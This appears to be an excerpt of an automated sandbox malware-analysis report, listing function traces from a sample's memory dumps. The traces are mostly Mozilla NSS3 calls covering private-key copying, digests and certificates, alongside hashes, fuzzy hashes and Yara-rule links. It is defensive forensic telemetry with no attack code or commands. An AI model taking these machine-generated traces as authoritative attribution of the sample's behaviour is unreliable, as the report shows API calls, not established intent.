                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Monitor$Exitstrdup$EnterErrorgetenv
                                                                                                                                                                                                                                                            • String ID: .;\lib$LD_LIBRARY_PATH
                                                                                                                                                                                                                                                            • API String ID: 2438426442-3838498337
                                                                                                                                                                                                                                                            • Opcode ID: 3892ddef2773cbded7a6d6ff8c72449a9c378396b0867fe2da722b29420cdb9e
                                                                                                                                                                                                                                                            • Instruction ID: b32264fbb9fd745a357fee15a87b717453ff45b7067068026291b9a615376926
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3892ddef2773cbded7a6d6ff8c72449a9c378396b0867fe2da722b29420cdb9e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9018FB7F1015167EE116BB49C0AB1A77B9AB0124DF584174EC0AA2522FE2FD824C6D6
                                                                                                                                                                                                                                                            Function 6BF5AB00 Relevance: 15.3, APIs: 10, Instructions: 293memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 6BF5A6D0: PORT_ZAlloc_Util.NSS3(00000A38,00000000,?,6BF580C1), ref: 6BF5A6F9
                                                                                                                                                                                                                                                              • Part of subcall function 6BF5A6D0: memcpy.VCRUNTIME140(00000210,6C020BEC,0000011C), ref: 6BF5A869
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,00000008,?,?,6BF580AD), ref: 6BF5AB48
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6BF18D2D,?,00000000,?), ref: 6BF1FB85
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6BF1FBB1
                                                                                                                                                                                                                                                            • PORT_Strdup_Util.NSS3(?,?,?,?,?,6BF580AD), ref: 6BF5AB8E
                                                                                                                                                                                                                                                            • PORT_Strdup_Util.NSS3(?,?,?,?,?,6BF580AD), ref: 6BF5ABA7
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,00000210,0000011C,?,?,?,?,6BF580AD), ref: 6BF5ABFE
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,000006AA,?,?,?,?,?,?,?,?,6BF580AD), ref: 6BF5AC1C
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,000006C0,?,?,?,?,?,?,?,?,?,?,?,6BF580AD), ref: 6BF5AC48
                                                                                                                                                                                                                                                              • Part of subcall function 6BF55BC0: PR_EnterMonitor.NSS3(8B105D8B,?,?,6BF580E3,00000000), ref: 6BF55BD6
                                                                                                                                                                                                                                                              • Part of subcall function 6BF55BC0: PR_EnterMonitor.NSS3(840FC085,?,?,6BF580E3,00000000), ref: 6BF55BED
                                                                                                                                                                                                                                                              • Part of subcall function 6BF55BC0: PR_EnterMonitor.NSS3(07890478,?,?,6BF580E3,00000000), ref: 6BF55C04
                                                                                                                                                                                                                                                              • Part of subcall function 6BF55BC0: PR_EnterMonitor.NSS3(000000F4,?,?,6BF580E3,00000000), ref: 6BF55C1B
                                                                                                                                                                                                                                                              • Part of subcall function 6BF55BC0: PR_Unlock.NSS3(0140BCE8,?,?,6BF580E3,00000000), ref: 6BF55C4C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF55BC0: PR_Unlock.NSS3(08C48300,?,?,6BF580E3,00000000), ref: 6BF55C5F
                                                                                                                                                                                                                                                              • Part of subcall function 6BF55BC0: PR_ExitMonitor.NSS3(8B105D8B,?,?,6BF580E3,00000000), ref: 6BF55C76
                                                                                                                                                                                                                                                              • Part of subcall function 6BF55BC0: PR_ExitMonitor.NSS3(840FC085,?,?,6BF580E3,00000000), ref: 6BF55C8D
                                                                                                                                                                                                                                                              • Part of subcall function 6BF55BC0: PR_ExitMonitor.NSS3(07890478,?,?,6BF580E3,00000000), ref: 6BF55CA4
                                                                                                                                                                                                                                                              • Part of subcall function 6BF55BC0: PR_ExitMonitor.NSS3(000000F4,?,?,6BF580E3,00000000), ref: 6BF55CBB
                                                                                                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(00000010,?,?,?,?,?,?,?,?,?,?,?,?,?,6BF580AD), ref: 6BF5ACED
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20D30: calloc.MOZGLUE ref: 6BF20D50
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20D30: TlsGetValue.KERNEL32 ref: 6BF20D6D
                                                                                                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(0000001C,?,?,?,?,?,?,?,?,?,?,?,?,?,6BF580AD), ref: 6BF5AD52
                                                                                                                                                                                                                                                            • SECKEY_CopyPrivateKey.NSS3(?), ref: 6BF5AEE5
                                                                                                                                                                                                                                                            • SECKEY_CopyPublicKey.NSS3(?), ref: 6BF5AEFC
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Monitor$Util$memcpy$Alloc_EnterExit$Copy$Strdup_Unlock$ArenaItem_PrivatePublicValuecalloc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3422837898-0
                                                                                                                                                                                                                                                            • Opcode ID: 85cc5416a763968eb51b84c2a7253d6907210f3b63f398a93b591fc88fe9c75d
                                                                                                                                                                                                                                                            • Instruction ID: 88b14d0822bfb85e262c993354c406eb825b0aa16aa8690255dd3343fe2af8f4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85cc5416a763968eb51b84c2a7253d6907210f3b63f398a93b591fc88fe9c75d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46D1FBB6A006029FDB44CF68C481BA5B7E5BF58314F0842B9DC5CDF716E734A9A4CBA1
                                                                                                                                                                                                                                                            Function 6BECBB90 Relevance: 15.2, APIs: 10, Instructions: 187memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 6BEE06A0: TlsGetValue.KERNEL32 ref: 6BEE06C2
                                                                                                                                                                                                                                                              • Part of subcall function 6BEE06A0: EnterCriticalSection.KERNEL32(?), ref: 6BEE06D6
                                                                                                                                                                                                                                                              • Part of subcall function 6BEE06A0: PR_Unlock.NSS3 ref: 6BEE06EB
                                                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00001000), ref: 6BECBC24
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6BECBC39
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000), ref: 6BECBC58
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6BECBCBE
                                                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6BECBCDA
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE00D,00000000), ref: 6BECBD04
                                                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6BECBD13
                                                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(00000000), ref: 6BECBD35
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6BECBD58
                                                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6BECBD88
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$CertificateDestroy$Alloc_ArenaArena_$CopyCriticalEnterErrorFreeItem_SectionUnlockValue
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 401161163-0
                                                                                                                                                                                                                                                            • Opcode ID: 876b09240eb6c2f93fc5e286ab3f2e4951a1184ebe23aab872634cbca4394ffb
                                                                                                                                                                                                                                                            • Instruction ID: 21720ead3194ebc5b06bdd732aa690860e851cbf68b2de8fa6c457880493bfc1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 876b09240eb6c2f93fc5e286ab3f2e4951a1184ebe23aab872634cbca4394ffb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E75172B5E013099BEB04CF79D982B9FBBF5AF44218F24442CE82597351EB38D915CB52
                                                                                                                                                                                                                                                            Function 6BF04A20 Relevance: 15.2, APIs: 10, Instructions: 182COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PK11_DoesMechanism.NSS3(?,?), ref: 6BF04A4B
                                                                                                                                                                                                                                                            • PK11_GetInternalSlot.NSS3 ref: 6BF04A59
                                                                                                                                                                                                                                                            • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6BF04AC6
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BF04B17
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6BF04B2B
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6BF04B77
                                                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(?), ref: 6BF04B87
                                                                                                                                                                                                                                                            • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6BF04B9A
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6BF04BA9
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6BF04BC1
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07AD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07CD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07D6
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BE4204A), ref: 6BEB07E4
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,6BE4204A), ref: 6BEB0864
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BEB0880
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,6BE4204A), ref: 6BEB08CB
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08D7
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08FB
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$K11_$DestroyPrivatecalloc$CriticalDoesEnterErrorFreeInternalItem_MechanismSectionSlotUnlockUtilZfree
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3936029921-0
                                                                                                                                                                                                                                                            • Opcode ID: 6af56c74334cade6408a2ea525a6edf0d0d5645688348a15a57a9d82b6e62e92
                                                                                                                                                                                                                                                            • Instruction ID: 448904260aa12df0b3bbd6fd16d305f44e059f7ecb0601ae2777b14b5868ac2d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6af56c74334cade6408a2ea525a6edf0d0d5645688348a15a57a9d82b6e62e92
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 165191B6E002099BDB00DF79DC51AAFB7F9AF58304F144069EC05A7321EB39ED119BA1
                                                                                                                                                                                                                                                            Function 6BF01940 Relevance: 15.2, APIs: 10, Instructions: 164COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(00000000,00000000,?,00000001,?,6BF0563C,?,?,00000000,00000001,00000002,?,?,?,?,?), ref: 6BF0195C
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,6BF0563C,?,?,00000000,00000001,00000002,?,?,?,?,?,6BEDEAC5,00000001), ref: 6BF01970
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,00000000,00000001,00000002,?,?,?,?,?,6BEDEAC5,00000001,?,6BEDCE9B,00000001,6BEDEAC5), ref: 6BF019A0
                                                                                                                                                                                                                                                              • Part of subcall function 6BF6DD70: TlsGetValue.KERNEL32 ref: 6BF6DD8C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF6DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6BF6DDB4
                                                                                                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(00000001,?,00000000,00000001,00000002,?,?,?,?,?,6BEDEAC5,00000001,?,6BEDCE9B,00000001,6BEDEAC5), ref: 6BF019BF
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalSectionValue$ArenaEnterLeaveMark_UnlockUtil
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3030358274-0
                                                                                                                                                                                                                                                            • Opcode ID: 24894bc699bd7066fdfd9d2f4e2586ba85b8c6591b2fdce66384f9361cd6097c
                                                                                                                                                                                                                                                            • Instruction ID: 61fbc26446a3d127805cad6874bd1540f4563e5dfb9143b9c14e98bcd7c6c53c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24894bc699bd7066fdfd9d2f4e2586ba85b8c6591b2fdce66384f9361cd6097c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C5196B7A001259BEF00DF64D891B6B77A5EF05758F0441A4FC198B231EB39DA50EBD1
                                                                                                                                                                                                                                                            Function 6BF64A70 Relevance: 15.1, APIs: 10, Instructions: 113memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(00000048,00000A20,0000032C,?,00000000,?,6BF5AEC0,00000A20,00000000), ref: 6BF64A8B
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20D30: calloc.MOZGLUE ref: 6BF20D50
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20D30: TlsGetValue.KERNEL32 ref: 6BF20D6D
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,00000008,?,00000000), ref: 6BF64AAA
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6BF18D2D,?,00000000,?), ref: 6BF1FB85
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6BF1FBB1
                                                                                                                                                                                                                                                            • PORT_Strdup_Util.NSS3(?,?,?,?,00000000), ref: 6BF64ABD
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6BEC2AF5,?,?,?,?,?,6BEC0A1B,00000000), ref: 6BF20F1A
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20F10: malloc.MOZGLUE(00000001), ref: 6BF20F30
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6BF20F42
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,00000020,?,?,?,?,?,00000000), ref: 6BF64AD6
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,00000034,?,?,?,?,?,?,?,?,00000000), ref: 6BF64AEC
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1FB60: PORT_Alloc_Util.NSS3(E0056800,00000000,?,?,6BF18D2D,?,00000000,?), ref: 6BF1FB9B
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000020,00000000,?,?,?,00000000), ref: 6BF64B49
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(-00000034,00000000,?,?,?,?,?,00000000), ref: 6BF64B58
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,00000000), ref: 6BF64B64
                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BF64B74
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 6BF64B7E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$Item_$Alloc_CopyZfree$freememcpy$ArenaStrdup_Valuecallocmallocstrlen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 476651045-0
                                                                                                                                                                                                                                                            • Opcode ID: 57c9bdc15b01d025c376c1fe8cce9e93154f9b6c5b25cd79c40971d9aa44282f
                                                                                                                                                                                                                                                            • Instruction ID: 88fcbf48104d4a272cbeebb10bfc98dce313c284adcadc4113a62cd4260e2a69
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 57c9bdc15b01d025c376c1fe8cce9e93154f9b6c5b25cd79c40971d9aa44282f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F631AEB6A042029FD750DF75DC92A57BBF8EF19288B044869EC4AC7212F735E505CBA1
                                                                                                                                                                                                                                                            Function 6BEE89C0 Relevance: 15.1, APIs: 10, Instructions: 84COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PK11_CreateDigestContext.NSS3(00000004,00000000,00000000,00000000,00000000,?,6BEEAE9B,00000000,?,?), ref: 6BEE89DE
                                                                                                                                                                                                                                                            • PK11_DigestBegin.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,6BEC2D6B,?,?,00000000), ref: 6BEE89EF
                                                                                                                                                                                                                                                            • PK11_DigestOp.NSS3(00000000,57016AC6,034C08E8,?,00000000,?,?,?,?,?,?,?,?,?,?,6BEC2D6B), ref: 6BEE8A02
                                                                                                                                                                                                                                                            • PK11_DestroyContext.NSS3(00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6BEC2D6B,?), ref: 6BEE8A11
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: K11_$Digest$Context$BeginCreateDestroy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 407214398-0
                                                                                                                                                                                                                                                            • Opcode ID: 77f44c1dea9362291f117892a2c1a08bbae324f87195f569c49c77dcc61e3ec8
                                                                                                                                                                                                                                                            • Instruction ID: 8a2c303c1584bb882db1418094251d8cb5e8b3c04dcd39783512698f215d480c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77f44c1dea9362291f117892a2c1a08bbae324f87195f569c49c77dcc61e3ec8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 701136F7E4020166FB505A74AC82B7B76589B4075CF184174ED0D9A342F76ED923C2B2
                                                                                                                                                                                                                                                            Function 6BF55BC0 Relevance: 15.1, APIs: 10, Instructions: 83COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3(8B105D8B,?,?,6BF580E3,00000000), ref: 6BF55BD6
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89090: TlsGetValue.KERNEL32 ref: 6BF890AB
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89090: TlsGetValue.KERNEL32 ref: 6BF890C9
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89090: EnterCriticalSection.KERNEL32 ref: 6BF890E5
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89090: TlsGetValue.KERNEL32 ref: 6BF89116
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89090: LeaveCriticalSection.KERNEL32 ref: 6BF8913F
                                                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3(840FC085,?,?,6BF580E3,00000000), ref: 6BF55BED
                                                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3(07890478,?,?,6BF580E3,00000000), ref: 6BF55C04
                                                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3(000000F4,?,?,6BF580E3,00000000), ref: 6BF55C1B
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(0140BCE8,?,?,6BF580E3,00000000), ref: 6BF55C4C
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(08C48300,?,?,6BF580E3,00000000), ref: 6BF55C5F
                                                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3(8B105D8B,?,?,6BF580E3,00000000), ref: 6BF55C76
                                                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3(840FC085,?,?,6BF580E3,00000000), ref: 6BF55C8D
                                                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3(07890478,?,?,6BF580E3,00000000), ref: 6BF55CA4
                                                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3(000000F4,?,?,6BF580E3,00000000), ref: 6BF55CBB
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
